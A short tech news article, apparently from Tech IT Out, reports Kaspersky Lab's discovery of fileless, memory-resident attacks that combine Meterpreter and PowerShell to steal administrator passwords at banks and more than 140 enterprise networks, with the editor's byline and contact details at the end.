Kaspersky Lab reveals Cybercriminals breach enterprises using hidden malware

caas

Banks, telecommunication companies and government organisations in Africa, the US, South America and Europe are among the top targets, with the infamous GCMAN and Carbanak groups the primary suspects.

Kaspersky Lab experts have discovered a series of “invisible” targeted attacks that use only legitimate software: widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows – dropping no malware files onto the hard drive, but hiding in the memory. This combined approach helps to avoid detection by whitelisting technologies, and leaves forensic investigators with almost no artefacts or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot.

At the end of 2016, Kaspersky Lab experts were contacted by banks in CIS which had found the penetration-testing software, Meterpreter, now often used for malicious purposes, in the memory of their servers when it was not supposed to be there. Kaspersky Lab discovered that the Meterpreter code was combined with a number of legitimate PowerShell scripts and other utilities.

The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators so that the attackers could remotely control the victim’s systems. The ultimate goal appears to have been access to financial processes.

Kaspersky Lab has since uncovered that these attacks are happening on a massive scale: hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the USA, France, Ecuador, Kenya, the UK and Russia.

Edited by: Darryl Linington
Contact:
Darryl@techitout.co.za
Follow @TechITOutMedia on Twitter
Follow @DarrylLinington on Twitter

Editor of Tech IT Out. Former radio host of Cliffcentral.com. Former Editor of IT News Africa and ITF Gaming. All round techie, gamer and entrepreneur. For Editorial Enquiries Contact: Darryl@techitout.co.za or via +27788021400.